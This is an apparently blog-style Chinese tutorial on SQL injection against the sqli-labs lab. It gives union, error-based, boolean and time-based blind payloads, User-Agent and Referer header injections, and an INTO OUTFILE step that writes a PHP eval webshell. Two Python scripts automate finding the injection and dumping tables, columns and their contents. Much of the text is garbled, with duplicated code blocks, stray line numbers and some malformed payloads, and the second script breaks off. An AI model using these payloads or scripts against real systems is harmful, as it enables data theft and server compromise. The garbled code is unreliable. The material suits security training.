Python应用04_自动sql注入攻击
目录
information_schema数据库:
注入流程:
1. 字符型:需要闭合
2.数字型:不需要闭合
3.字符型,加括号
4.字符型,加括号,双引号
5.盲注,有报错信息,无数据显示
5.1单引号
5.2双引号
5.3时间盲注
7.写入文件注入 lv7
8.表单类型,POST请求,数字型
9.双引号闭合
10.POST盲注
11.header的User-Agent注入
12.header的Referer注入
自动注入:盲注
自动注入+盲注
注意事项:union联合查询会对查询结果自动去重,若不需要去重,在union后面加上 ‘all’ 即可
ORDER BY 3使用
SELECT table_name FROM information_schema.tables ORDER BY 3
information_schema数据库:
关键表:
SCHEMATA表:提供了当前mysql中所有数据库的信息TABLES表:提供了当前mysql中所有数据表的信息COLUMNS表:提供了当前mysql中所有字段的信息
注入流程:
1.测试正确的语句
2.测试闭合语句:
1' 1" 1') 1") 1')) 1")) 多数情况下测试这4中就差不多了
sql语句中,单引号可以包含双引号如
'123"被包含"456'1
1
'123"被包含"456' 3.在闭合语句后面编写 and1 或and 0测试后台是否将我们的输入当成语句执行了
4.如果遇到插入、更新数据库信息的,不能使用select查询,应使用updatexml、extractvalue函数报错来查询
1. 字符型:需要闭合
报错信息:输入?id=3' -->3'LIMIT 0,1playlod:?id=3' and 1=1 %23
?id=-1‘ union select 1,table_name,column_name from information_schema.columns where table_name='users'%23
?id=-1’ union SELECT 1,user(),(concat(database(),'----')%23
?id=-1‘ union SELECT 1,user(),concat(database(),'----',version())#
?id=-1’ union SELECT 1,user(),(concat(database(),'----',version()))%23
?id=-1‘ union SELECT 1,2,updatexml(1,concat(0x7e,version()),0);
?id=-1’ union SELECT 1,2,extractvalue(1, concat(0x7e, VERSION()));
-- updatexml 和extractvalue最多只能返回32个字符,需要使用substr多次获取,再拼接起来
group_concat:将所有结果拼接起来,substr:将结果返回的字符串切割,进获取参数的前几个字节
SELECT updatexml(1, concat(0x7e, substr((SELECT group_concat(TABLE_NAME) FROM information_schema.TABLES), 1, 32)), 1);
SELECT updatexml(1, concat(0x7e, (SELECT group_concat(TABLE_NAME) FROM information_schema.TABLES), 1, 32), 1);11
1
?id=-1‘ union select 1,table_name,column_name from information_schema.columns where table_name='users'%232
?id=-1’ union SELECT 1,user(),(concat(database(),'----')%233
?id=-1‘ union SELECT 1,user(),concat(database(),'----',version())#4
?id=-1’ union SELECT 1,user(),(concat(database(),'----',version()))%235
?id=-1‘ union SELECT 1,2,updatexml(1,concat(0x7e,version()),0);6
?id=-1’ union SELECT 1,2,extractvalue(1, concat(0x7e, VERSION()));7
8
-- updatexml 和extractvalue最多只能返回32个字符,需要使用substr多次获取,再拼接起来9
group_concat:将所有结果拼接起来,substr:将结果返回的字符串切割,进获取参数的前几个字节10
SELECT updatexml(1, concat(0x7e, substr((SELECT group_concat(TABLE_NAME) FROM information_schema.TABLES), 1, 32)), 1);11
SELECT updatexml(1, concat(0x7e, (SELECT group_concat(TABLE_NAME) FROM information_schema.TABLES), 1, 32), 1);2.数字型:不需要闭合
报错信息:
输入 ?id=1
select 字段名,字段名,字段名 from 数据库.表名 where 条件xxx
?id=-1 union select 1,database(),version() LIMIT 0,2%23
?id=-1 union select 1,table_name,column_name from information_schema.columns where table_name='users'%23
#查询数据库
?id=-1 union select 1,database(),2 %23 -- 数据库结果为:security
#查询表名
?id=-1 union select 1,TABLE_NAME,2 from information_schema.TABLES where TABLE_SCHEMA='security' limit 3,1 -- 1 表名结果为users
#查询列名
?id=-1 union select 1,COLUMN_NAME,2 from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA='security' limit 1,1-- 1 列名结果为username
?id=-1 union select 1,COLUMN_NAME,2 from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA='security' limit 2,1-- 1 列名结果为password
#查询表的内容
?id=-1 union select 1,username,password from security.users limit 1,1 --12
1
select 字段名,字段名,字段名 from 数据库.表名 where 条件xxx 2
?id=-1 union select 1,database(),version() LIMIT 0,2%233
?id=-1 union select 1,table_name,column_name from information_schema.columns where table_name='users'%234
#查询数据库5
?id=-1 union select 1,database(),2 %23 -- 数据库结果为:security6
#查询表名7
?id=-1 union select 1,TABLE_NAME,2 from information_schema.TABLES where TABLE_SCHEMA='security' limit 3,1 -- 1 表名结果为users8
#查询列名9
?id=-1 union select 1,COLUMN_NAME,2 from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA='security' limit 1,1-- 1 列名结果为username10
?id=-1 union select 1,COLUMN_NAME,2 from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA='security' limit 2,1-- 1 列名结果为password11
#查询表的内容12
?id=-1 union select 1,username,password from security.users limit 1,1 --3.字符型,加括号
报错信息:输入?id=1'--> 1'') LIMIT 0,1' 闭合标签:1') or 1=1
palyload: ?id=1') and 1=1 %23
?id=1') union select 1,database(),version() LIMIT 1,2 %231
1
?id=1') union select 1,database(),version() LIMIT 1,2 %234.字符型,加括号,双引号
报错信息:输入?id=1" -->1"") LIMIT 0,1 闭合标签:1") or 1=1%23
palyload: ?id=1") and 1=1 %23
?id=-1")union select 1,3,2%231
1
?id=-1")union select 1,3,2%235.盲注,有报错信息,无数据显示
5.1单引号
报错信息:?id=1 显示内容:You are in...........?id=1' '1'' LIMIT 0,1?id=1’ and 1=1 %23-->没有报错,显示内容:You are in...........?id=1’ and 1=2 %23-->没有报错,无任何内容显示由以上得知,实际上注入的语句已经查询成功了:查询语句为真的,返回不为空,查询语句为假的,返回为空palyload:?id=1’ and length(database()) %23使用布尔盲注进行注入:
-- 盲注常用函数:
substr: 查找字符串中的子串 取第1个字符:substr(str,1,1) 取第2个字符:substr(str,2,1) 取第3个字符:substr(str,3,1)
ascii: 将字符转换为ascii码
right: 取字符串右边子串
left: 取字符串左边子串
length:求字符串长度
#查询数据库名称
# 查询数据库名称的长度
-- lenght查询长度,若长度=2为真,就会有返回值,否则就没有返回值,一直重复尝试,直到有返回值的时候,说明真正的长度找到了
?id=1’ and length(database())>2 %23
重复n次,直到返回 "You are in..........."时结束,得到正确结果
# 查询数据库名称
?id=1’ and ascii(substr(database(),1,1))=115 %23--115对应ascii码的s
?id=1’ and substr(database(),1,1)<'s' %23
重复操作长度次数,得到数据库名称:security
#查询数据表名称
#查询多少张表,count()将会返回有多少行结果,可以用于盲注判断行数、s
select count(table_name) from information_schema.tables where table_schema=database();
#查询当前数据库的所有数据表
#查询所有表名的长度(包括group_concat的',')
?id=1‘ and length( (select+group_concat(TABLE_NAME)+FROM+information_schema.TABLES+where+table_schema=database()) )+=+29+ --+
#查询第一个表
1’ and substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1,1),1,1) ='u'%23
重复操作
#查询第二个表
1’ and substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit ,1),1,1) ='u'%23
重复操作
#查询第三个表
1’ and substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 3,1,1,1) ='u'-- 1
重复操作,得到第三个表的表名为'uesrs'
#查询所有表
Less-1/?id=1’ union select 1,(SELECT group_concat(TABLE_NAME) FROM information_schema.TABLES where table_schema=database()),2 limit 1,1--+
#查询列名称
select column_name from information_schema.columns where table_schema='security';
1’ and substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' limit 1,1),1,1) ='u'-- 1
重复操作,得到列名称'username'...
#查询数据
1’ and substr((select username from security.users limit 1,1),1,1) ='u'%23
重复操作,最终得到想要的数据
43
1
-- 盲注常用函数:2
substr: 查找字符串中的子串 取第1个字符:substr(str,1,1) 取第2个字符:substr(str,2,1) 取第3个字符:substr(str,3,1)3
ascii: 将字符转换为ascii码4
right: 取字符串右边子串5
left: 取字符串左边子串6
length:求字符串长度7
8
#查询数据库名称9
# 查询数据库名称的长度 10
-- lenght查询长度,若长度=2为真,就会有返回值,否则就没有返回值,一直重复尝试,直到有返回值的时候,说明真正的长度找到了11
?id=1’ and length(database())>2 %2312
重复n次,直到返回 "You are in..........."时结束,得到正确结果13
# 查询数据库名称14
?id=1’ and ascii(substr(database(),1,1))=115 %23--115对应ascii码的s15
?id=1’ and substr(database(),1,1)<'s' %2316
重复操作长度次数,得到数据库名称:security17
#查询数据表名称18
#查询多少张表,count()将会返回有多少行结果,可以用于盲注判断行数、s19
select count(table_name) from information_schema.tables where table_schema=database();20
#查询当前数据库的所有数据表21
#查询所有表名的长度(包括group_concat的',')22
?id=1‘ and length( (select+group_concat(TABLE_NAME)+FROM+information_schema.TABLES+where+table_schema=database()) )+=+29+ --+23
#查询第一个表24
1’ and substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1,1),1,1) ='u'%2325
重复操作26
#查询第二个表27
1’ and substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit ,1),1,1) ='u'%2328
重复操作29
#查询第三个表30
1’ and substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 3,1,1,1) ='u'-- 131
重复操作,得到第三个表的表名为'uesrs'32
#查询所有表33
Less-1/?id=1’ union select 1,(SELECT group_concat(TABLE_NAME) FROM information_schema.TABLES where table_schema=database()),2 limit 1,1--+34
#查询列名称35
select column_name from information_schema.columns where table_schema='security';36
1’ and substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' limit 1,1),1,1) ='u'-- 137
重复操作,得到列名称'username'...38
#查询数据39
40
1’ and substr((select username from security.users limit 1,1),1,1) ='u'%2341
重复操作,最终得到想要的数据42
43
5.2双引号
错误信息:
?id=1 显示内容:You are in ......
?id=1" and 1=0 %23 不显示任何信息
?id=1" and 1=1 %23 显示内容:You are in ......
同上1
1
同上5.3时间盲注
if(a,b,c);如果a成立,则执行b,否则返回c
1‘ and if((length(database())=2),sleep(5),null)#1
1
1‘ and if((length(database())=2),sleep(5),null)#7.写入文件注入 lv7
错误信息:
?id=1' %23 You have an error in your SQL syntax?id=1 You are in.... Use outfile...... ?id=1" %23 You are in.... Use outfile......
?id=1" and 1=1 %23 You are in.... Use outfile...... ?id=1" and 1=0 %23 You are in.... Use outfile...... ?id=1 afkashfklkldjhasld You are in.... Use outfile......
只会提取id中的有效数字,应该是做了处理。例如:输入1xxx,只会接收1,输入12xxx,只会接收12,输入1"xxcx也是只会接收1。
继续测试,此时应该考虑加括号
?id=1')%23 You have an error in your SQL syntax ?id=1") %23 You have an error in your SQL syntax
?id=1"))%23 You have an error in your SQL syntax ?id=1'))%23 You are in.... Use outfile......
最终成功的测试?id=1'))%23可以闭合语句
palylode:?id=1')) union select 1,2,3 %23
通过palyload写入一句话到服务器
通过写入文件的方式传入 webshell ,使用的是 '指令' into outfile '路径'
输入:1')) union (select 1,2,'<?php隔@隔e隔val($_P隔O隔S隔T["test"]?>' into outfile 'C:/phpStudy/PHPTutorial/WWW/sqli/123.php') -- 1
- 需要服务器开启一个权限 --secure-file-priv,在配置.ini 的 [mysqld] 下添加secure_file_priv =
- 需要知道目标服务器的有效路径,所以通常路径会写较为常见的,通常写入到日志路径
// 包含的是 php 的脚本,会被作为 php 代码执行
<?php ... ?>
// 表示忽略错误或者警告信息执行后面的指令
@
// 服务器执行后面传入的指令
eval(cmd)
// 服务器接收到的用户输入的 post 参数组成的字典
$_POST
// 用户通过 POST 方式传入的键为 test 的值
$_POST["test"]
// 强制执行用户通过post的方式传入的名为 test 的指令
<?php@eval($_POST["test"]?>23
1
通过写入文件的方式传入 webshell ,使用的是 '指令' into outfile '路径'2
输入:1')) union (select 1,2,'<?php隔@隔e隔val($_P隔O隔S隔T["test"]?>' into outfile 'C:/phpStudy/PHPTutorial/WWW/sqli/123.php') -- 13
4
- 需要服务器开启一个权限 --secure-file-priv,在配置.ini 的 [mysqld] 下添加secure_file_priv =5
- 需要知道目标服务器的有效路径,所以通常路径会写较为常见的,通常写入到日志路径 6
7
// 包含的是 php 的脚本,会被作为 php 代码执行8
<?php ... ?>9
10
// 表示忽略错误或者警告信息执行后面的指令11
@12
13
// 服务器执行后面传入的指令14
eval(cmd)15
16
// 服务器接收到的用户输入的 post 参数组成的字典17
$_POST18
19
// 用户通过 POST 方式传入的键为 test 的值20
$_POST["test"]21
22
// 强制执行用户通过post的方式传入的名为 test 的指令23
<?php@eval($_POST["test"]?>8.表单类型,POST请求,数字型
uname=账号内容 passwd=密码内容
palyload = uname=' union select 1,2,3 %23'&passwd=admin'
palyload = uname=admin&passwd=' union select 1,2,3 %233
1
uname=账号内容 passwd=密码内容2
palyload = uname=' union select 1,2,3 %23'&passwd=admin'3
palyload = uname=admin&passwd=' union select 1,2,3 %239.双引号闭合
正确的输入:uname=admin&passwd=admin
测试输入:uname=admin&passwd=admin
输入:uname=admin"))#&passwd=admin 报错: )#") and password=("admin") LIMIT 0,1 可以猜测源码: uname=("输入内容") LIMIT 0,1
palyload:uname=admin") union select 1,2#&passwd=admin
10.POST盲注
palyload: uname=admin' and length(version())=6#&passwd=admin
palyload: uname=admin")and length(version())=6 #&passwd=admin
11.header的User-Agent注入
当页面有显示:你的当前IP地址为:xxxxx时,说明网站获取了我们的ip地址,存储到了数据库中
原理:服务能收集请求头部的user-Agent字段信息之后,上传到数据库了,然后再通过数据库信息查询来获取
palyload:在HackBar插件中,输入正确的账户密码,点击 ADD HEADER 添加user-Agent字段,设置值为:' and updatexml(1,concat(0x7e, version()),1),'','') #
12.header的Referer注入
原理:服务能收集请求头部的Referer字段信息之后,上传到数据库了,然后再通过数据库信息查询来获取
palyload:在HackBar插件中,输入正确的账户密码,点击 ADD HEADER 添加Referer字段,设置值为:' and updatexml(1,concat(0x7e, version()),1),'','') #
双注入
count():分组计数,只有分组查询的时候可以使用
rand(n):接收随机数种子,生成浮点数
floor(rand(0)*2):向下取整,rand传0,可以固定随机数顺序
edge浏览器
18
useragen的信息添加到了数据库,
header不能识别%23,使用#
19
cookie数据被添加到了数据库
测试是否安装成功
文件路径下,控制台 python sqlmap.py
自动注入:盲注
from prettytable import PrettyTable
import HackRequests
from bs4 import BeautifulSoup
import re
import time
#1.判断能否注入以及注入类型
Type=0
dic1 = ['?id=1', '?id=1\'+--+', '?id=1\')+--+1', '?id=1\'))+--+', '?id=1"+--+', '?id=1")+--+', '?id=1"))+--+']
dic2 = ['?id=1+', '?id=1\'+', '?id=1\')+', '?id=1\'))+', '?id=1"+', '?id=1")+', '?id=1"))+']
palyload2 = 'and+1+--+'
dic3 = ['?id=1+', '?id=1\'+', '?id=1\')+', '?id=1\'))+', '?id=1"+', '?id=1")+', '?id=1"))+']
palyload3='and+0+--+'
# url = 'http://192.168.213.130/sqli-labs/Less-{}/'
# url = input('>>输入url')
headers = {'accept': '', 'accept-encoding': '', 'accept-language': '', 'cache-control': '', 'cookie': '', 'referer': '', 'sec-fetch-dest': '', 'sec-fetch-mode': '', 'sec-fetch-site': '', 'sec-fetch-user': '',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36'}
url = 'http://192.168.213.130/sqli-labs/Less-1/'
# url = input('输入url')
res = HackRequests.http(url, headers=headers)
post = re.findall('.*?form.*?method="post"', res.text())
if post == []:
for i in range(7):
url1 = url + dic1[i]
url2 = url + dic2[i]+palyload2
url3 = url + dic3[i]+palyload3
res1 = HackRequests.http(url1, headers=headers)
res2 = HackRequests.http(url2, headers=headers)
res3 = HackRequests.http(url3, headers=headers)
if res2.text() == res1.text() != res3.text():
Type = i
break
if i==6:
print('')
table = PrettyTable(['url', '是否可注入', '注入paload', '注入类型', '请求方式'])
table.add_row([url, '否', '-------', '不能使用联合查询', 'Get'])
print(table)
else:
print('')
print('Post型请使用其他程序')
exit()
#2.测试联合点
def TestUnion(palyloadType,param,union='',bPrint=True,bPrint2=True):
str = '236987'
strUnionLine=''
NumSum=0
palyload=''
'union select 9991236987 limit 0,1--+'
for i in range(1,10):
if i ==1:
strUnionLine+='999{}'.format(i)+str
palyload = 'union+select+{}+limit+1,1--+'.format(strUnionLine)
else:
strUnionLine+=','+'999{}'.format(i)+str
palyload = 'union+select+{}+limit+1,1--+'.format(strUnionLine)
palyloadUnion = palyloadType + palyload
PalyloadUrl = url + palyloadUnion
resUion = HackRequests.http(PalyloadUrl, headers=headers)
ShowNums = re.findall('999(.*?)236987',resUion.text())
if ShowNums!=[]:
NumSum = i
if bPrint ==True and bPrint2==True:
print('')
table = PrettyTable(['url', '是否可注入', '注入paload','注入类型','请求方式'])
table.add_row([url, '是', palyloadType+palyload2,'联合查询','Get'])
print(table)
break
if i == 9:
print('')
table = PrettyTable(['url','是否可注入','注入paload' ,'注入类型','请求方式'])
table.add_row([url,'是',palyloadType+palyload2 ,'不能使用联合查询','Get'])
print(table)
print('')
return
# print(ShowNums)
ShowNum = int(ShowNums[0])
#3.构造查询语句
strUnionLine=''
for i in range(1, NumSum+1):
if i == 1:
strUnionLine += '1'
elif i == ShowNum:
strUnionLine +=','+'concat(999,{},236987)'.format(param)
else:
strUnionLine += ',' + '1'
if union=='':
palyload = 'union+select+{}+limit+1,1--+'.format(strUnionLine)
else:
palyload='union+select+{}+'.format(strUnionLine)+union+'+limit+1,1+--+'
# if strUnionLine =='1,concat(999,group_concat(id),236987),1':
# dic=['?id=-1+', '?id=-1\'+', '?id=-1\')+and+', '?id=-1\'))+', '?id=-1"+', '?id=-1")+', '?id=-1"))+']
# global Type
# palyloadType=dic[Type]
palyloadUnion = palyloadType + palyload
PalyloadUrl = url + palyloadUnion
resUion = HackRequests.http(PalyloadUrl, headers=headers)
Context = re.findall('999(.*?)236987', resUion.text())
str = Context[0]
list =str.split(',')
str = re.findall('group_concat\((.*?)\)',param)
table = PrettyTable([str[0],])
for l in list:
table.add_row([l, ])
if bPrint==True:
print(table)
return list
#4.解析页面信息,获取查询结果
def n1():
# 查询数据库:security
ShuJuKu = 'group_concat(database()+)'
TestUnion(dic2[Type], ShuJuKu)
def n2():
# 查询数据库版本:5.5.53
BanBen = 'group_concat(version())'
TestUnion(dic2[Type], BanBen)
def n3():
# 查询所有表格:
BiaoGe = 'group_concat(table_name)'
union = 'FROM+information_schema.tables+WHERE+table_schema+=database()'
# ['emails,referers,uagents,users']
TestUnion(dic2[Type], BiaoGe,union)
def n4(name='',bPrint=True,bPrint2=True):
# 查询所有列
Lie = 'group_concat(column_name)'
if name=='':
name = input('''
请输入需要查询的表名
''')
union = 'FROM+information_schema.columns+WHERE+table_schema+=database()+and+table_name=\'{}\''.format(name) # emails表:['id,email_id']
return TestUnion(dic2[Type], Lie, union,bPrint,bPrint2)
def n5():
# 查询列的内容
str1 = input('''
请输入需要查询的表名
''')
str2 = input('''
请输入需要查询的列名
''')
NeiRong = 'group_concat({})'.format(str2)
union = 'FROM+{}+'.format(str1)
TestUnion(dic2[Type], NeiRong, union)
while True:
num = int(input('''
请输入
1:查询数据库
2:查询数据库版本
3:查询表格
4:查询列名
5:查询内容
6:查询指定表格所有内容
'''))
if num==1:
n1()
elif num==2:
n2()
elif num==3:
n3()
elif num==4:
n4()
elif num==5:
n5()
elif num == 6:
# 查询所有列的内容
name = input('''
请输入需要查询的表名
''')
list =n4(name,False)
for l in list:
union = 'FROM+{}+'.format(name)
NeiRong = 'group_concat({})'.format(l)
TestUnion(dic2[Type], NeiRong, union,bPrint2=False)
189
1
from prettytable import PrettyTable2
import HackRequests3
from bs4 import BeautifulSoup4
import re5
import time6
7
#1.判断能否注入以及注入类型8
Type=09
dic1 = ['?id=1', '?id=1\'+--+', '?id=1\')+--+1', '?id=1\'))+--+', '?id=1"+--+', '?id=1")+--+', '?id=1"))+--+']10
11
dic2 = ['?id=1+', '?id=1\'+', '?id=1\')+', '?id=1\'))+', '?id=1"+', '?id=1")+', '?id=1"))+']12
palyload2 = 'and+1+--+'13
14
dic3 = ['?id=1+', '?id=1\'+', '?id=1\')+', '?id=1\'))+', '?id=1"+', '?id=1")+', '?id=1"))+']15
palyload3='and+0+--+'16
17
# url = 'http://192.168.213.130/sqli-labs/Less-{}/'18
# url = input('>>输入url')19
headers = {'accept': '', 'accept-encoding': '', 'accept-language': '', 'cache-control': '', 'cookie': '', 'referer': '', 'sec-fetch-dest': '', 'sec-fetch-mode': '', 'sec-fetch-site': '', 'sec-fetch-user': '',20
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36'}21
url = 'http://192.168.213.130/sqli-labs/Less-1/'22
# url = input('输入url')23
res = HackRequests.http(url, headers=headers)24
post = re.findall('.*?form.*?method="post"', res.text())25
if post == []:26
for i in range(7):27
url1 = url + dic1[i]28
url2 = url + dic2[i]+palyload229
url3 = url + dic3[i]+palyload330
res1 = HackRequests.http(url1, headers=headers)31
res2 = HackRequests.http(url2, headers=headers)32
res3 = HackRequests.http(url3, headers=headers)33
if res2.text() == res1.text() != res3.text():34
Type = i35
break36
if i==6:37
print('')38
table = PrettyTable(['url', '是否可注入', '注入paload', '注入类型', '请求方式'])39
table.add_row([url, '否', '-------', '不能使用联合查询', 'Get'])40
print(table)41
else:42
print('')43
print('Post型请使用其他程序')44
exit()45
#2.测试联合点46
def TestUnion(palyloadType,param,union='',bPrint=True,bPrint2=True):47
str = '236987'48
strUnionLine=''49
NumSum=050
palyload=''51
'union select 9991236987 limit 0,1--+'52
for i in range(1,10):53
if i ==1:54
strUnionLine+='999{}'.format(i)+str55
palyload = 'union+select+{}+limit+1,1--+'.format(strUnionLine)56
else:57
strUnionLine+=','+'999{}'.format(i)+str58
palyload = 'union+select+{}+limit+1,1--+'.format(strUnionLine)59
palyloadUnion = palyloadType + palyload60
PalyloadUrl = url + palyloadUnion61
resUion = HackRequests.http(PalyloadUrl, headers=headers)62
ShowNums = re.findall('999(.*?)236987',resUion.text())63
if ShowNums!=[]:64
NumSum = i65
if bPrint ==True and bPrint2==True:66
print('')67
table = PrettyTable(['url', '是否可注入', '注入paload','注入类型','请求方式'])68
table.add_row([url, '是', palyloadType+palyload2,'联合查询','Get'])69
print(table)70
break71
if i == 9:72
print('')73
table = PrettyTable(['url','是否可注入','注入paload' ,'注入类型','请求方式'])74
table.add_row([url,'是',palyloadType+palyload2 ,'不能使用联合查询','Get'])75
print(table)76
print('')77
return78
79
# print(ShowNums)80
ShowNum = int(ShowNums[0])81
#3.构造查询语句82
strUnionLine=''83
for i in range(1, NumSum+1):84
if i == 1:85
strUnionLine += '1'86
elif i == ShowNum:87
strUnionLine +=','+'concat(999,{},236987)'.format(param)88
else:89
strUnionLine += ',' + '1'90
if union=='':91
palyload = 'union+select+{}+limit+1,1--+'.format(strUnionLine)92
else:93
palyload='union+select+{}+'.format(strUnionLine)+union+'+limit+1,1+--+'94
# if strUnionLine =='1,concat(999,group_concat(id),236987),1':95
# dic=['?id=-1+', '?id=-1\'+', '?id=-1\')+and+', '?id=-1\'))+', '?id=-1"+', '?id=-1")+', '?id=-1"))+']96
# global Type97
# palyloadType=dic[Type]98
palyloadUnion = palyloadType + palyload99
PalyloadUrl = url + palyloadUnion100
resUion = HackRequests.http(PalyloadUrl, headers=headers)101
Context = re.findall('999(.*?)236987', resUion.text())102
str = Context[0]103
list =str.split(',')104
str = re.findall('group_concat\((.*?)\)',param)105
106
table = PrettyTable([str[0],])107
for l in list:108
table.add_row([l, ])109
if bPrint==True:110
print(table)111
return list112
#4.解析页面信息,获取查询结果113
114
def n1():115
# 查询数据库:security116
ShuJuKu = 'group_concat(database()+)'117
TestUnion(dic2[Type], ShuJuKu)118
119
def n2():120
# 查询数据库版本:5.5.53121
BanBen = 'group_concat(version())'122
TestUnion(dic2[Type], BanBen)123
124
def n3():125
# 查询所有表格:126
BiaoGe = 'group_concat(table_name)'127
union = 'FROM+information_schema.tables+WHERE+table_schema+=database()'128
# ['emails,referers,uagents,users']129
TestUnion(dic2[Type], BiaoGe,union)130
131
def n4(name='',bPrint=True,bPrint2=True):132
# 查询所有列133
Lie = 'group_concat(column_name)'134
if name=='':135
name = input('''136
请输入需要查询的表名137
''')138
union = 'FROM+information_schema.columns+WHERE+table_schema+=database()+and+table_name=\'{}\''.format(name) # emails表:['id,email_id']139
return TestUnion(dic2[Type], Lie, union,bPrint,bPrint2)140
141
def n5():142
# 查询列的内容143
str1 = input('''144
请输入需要查询的表名145
''')146
str2 = input('''147
请输入需要查询的列名148
''')149
NeiRong = 'group_concat({})'.format(str2)150
union = 'FROM+{}+'.format(str1)151
TestUnion(dic2[Type], NeiRong, union)152
153
154
while True:155
num = int(input('''156
请输入157
1:查询数据库158
2:查询数据库版本159
3:查询表格160
4:查询列名161
5:查询内容162
6:查询指定表格所有内容163
'''))164
if num==1:165
n1()166
elif num==2:167
n2()168
elif num==3:169
n3()170
elif num==4:171
n4()172
elif num==5:173
n5()174
elif num == 6:175
# 查询所有列的内容176
name = input('''177
请输入需要查询的表名178
''')179
list =n4(name,False)180
for l in list:181
union = 'FROM+{}+'.format(name)182
NeiRong = 'group_concat({})'.format(l)183
TestUnion(dic2[Type], NeiRong, union,bPrint2=False)184
185
186
187
188
189
自动注入+盲注
from prettytable import PrettyTable
import HackRequests
from bs4 import BeautifulSoup
import re
import time
#1.判断能否注入以及注入类型
Type=0
dic1 = ['?id=1', '?id=1\'+--+', '?id=1\')+--+1', '?id=1\'))+--+', '?id=1"+--+', '?id=1")+--+', '?id=1"))+--+']
dic2 = ['?id=1+', '?id=1\'+', '?id=1\')+', '?id=1\'))+', '?id=1"+', '?id=1")+', '?id=1"))+']
palyload2 = 'and+1+--+'
dic3 = ['?id=1+', '?id=1\'+', '?id=1\')+', '?id=1\'))+', '?id=1"+', '?id=1")+', '?id=1"))+']
palyload3='and+0+--+'
# url = 'http://192.168.213.130/sqli-labs/Less-{}/'
# url = input('>>输入url')
headers = {'accept': '', 'accept-encoding': '', 'accept-language': '', 'cache-control': '', 'cookie': '', 'referer': '', 'sec-fetch-dest': '', 'sec-fetch-mode': '', 'sec-fetch-site': '', 'sec-fetch-user': '',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36'}
url = 'http://192.168.213.130/sqli-labs/Less-1/'
# url = input('输入url')
def statr():
global Type
res = HackRequests.http(url, headers=headers)
post = re.findall('.*?form.*?method="post"', res.text())
if post == []:
for i in range(7):
url1 = url + dic1[i]
url2 = url + dic2[i]+palyload2
url3 = url + dic3[i]+palyload3
res1 = HackRequests.http(url1, headers=headers)
res2 = HackRequests.http(url2, headers=headers)
res3 = HackRequests.http(url3, headers=headers)
if res2.text() == res1.text() != res3.text():
Type = i
break
if i==6:
print('')
table = PrettyTable(['url', '是否可注入', '注入paload', '注入类型', '请求方式'])
table.add_row([url, '否', '-------', '不能使用联合查询', 'Get'])
print(table)
else:
print('')
print('Post型请使用其他程序')
exit()
#2.测试联合点
def TestUnion(palyloadType,param,union='',bPrint=True,bPrint2=True):
global Type
str = '236987'
strUnionLine=''
NumSum=0
palyload=''
'union select 9991236987 limit 0,1--+'
for i in range(1,10):
if i ==1:
strUnionLine+='999{}'.format(i)+str
palyload = 'union+select+{}+limit+1,1--+'.format(strUnionLine)
else:
strUnionLine+=','+'999{}'.format(i)+str
palyload = 'union+select+{}+limit+1,1--+'.format(strUnionLine)
palyloadUnion = palyloadType + palyload
PalyloadUrl = url + palyloadUnion
resUion = HackRequests.http(PalyloadUrl, headers=headers)
ShowNums = re.findall('999(.*?)236987',resUion.text())
if ShowNums!=[]:
NumSum = i
if bPrint ==True and bPrint2==True:
print('')
table = PrettyTable(['url', '是否可注入', '注入paload','注入类型','请求方式'])
table.add_row([url, '是', palyloadType+palyload2,'联合查询','Get'])
print(table)
break
if i == 9:
print('')
table = PrettyTable(['url','是否可注入','注入paload' ,'注入类型','请求方式'])
table.add_row([url,'是',palyloadType+palyload2 ,'不能使用联合查询','Get'])
print(table)
print('')
return
# print(ShowNums)
ShowNum = int(ShowNums[0])
#3.构造查询语句
strUnionLine=''
for i in range(1, NumSum+1):
if i == 1:
strUnionLine += '1'
elif i == ShowNum:
strUnionLine +=','+'concat(999,{},236987)'.format(param)
else:
strUnionLine += ',' + '1'
if union=='':
palyload = 'union+select+{}+limit+1,1--+'.format(strUnionLine)
else:
palyload='union+select+{}+'.format(strUnionLine)+union+'+limit+1,1+--+'
# if strUnionLine =='1,concat(999,group_concat(id),236987),1':
# dic=['?id=-1+', '?id=-1\'+', '?id=-1\')+and+', '?id=-1\'))+', '?id=-1"+', '?id=-1")+', '?id=-1"))+']
# global Type
# palyloadType=dic[Type]
palyloadUnion = palyloadType + palyload
PalyloadUrl = url + palyloadUnion
resUion = HackRequests.http(PalyloadUrl, headers=headers)
Context = re.findall('999(.*?)236987', resUion.text())
str = Context[0]
list =str.split(',')
str = re.findall('group_concat\((.*?)\)',param)
table = PrettyTable([str[0],])
for l in list:
table.add_row([l, ])
if bPrint==True:
print(table)
return list
#4.解析页面信息,获取查询结果
def n1():
global Type
# 查询数据库:security
ShuJuKu = 'group_concat(database()+)'
TestUnion(dic2[Type], ShuJuKu)
def n2():
global Type
# 查询数据库版本:5.5.53
BanBen = 'group_concat(version())'
TestUnion(dic2[Type], BanBen)
def n3():
global Type
# 查询所有表格:
BiaoGe = 'group_concat(table_name)'
union = 'FROM+information_schema.tables+WHERE+table_schema+=database()'
# ['emails,referers,uagents,users']
TestUnion(dic2[Type], BiaoGe,union)
def n4(name='',bPrint=True,bPrint2=True):
global Type
# 查询所有列
Lie = 'group_concat(column_name)'
if name=='':
name = input('''
请输入需要查询的表名
''')
union = 'FROM+information_schema.columns+WHERE+table_schema+=database()+and+table_name=\'{}\''.format(name) # emails表:['id,email_id']
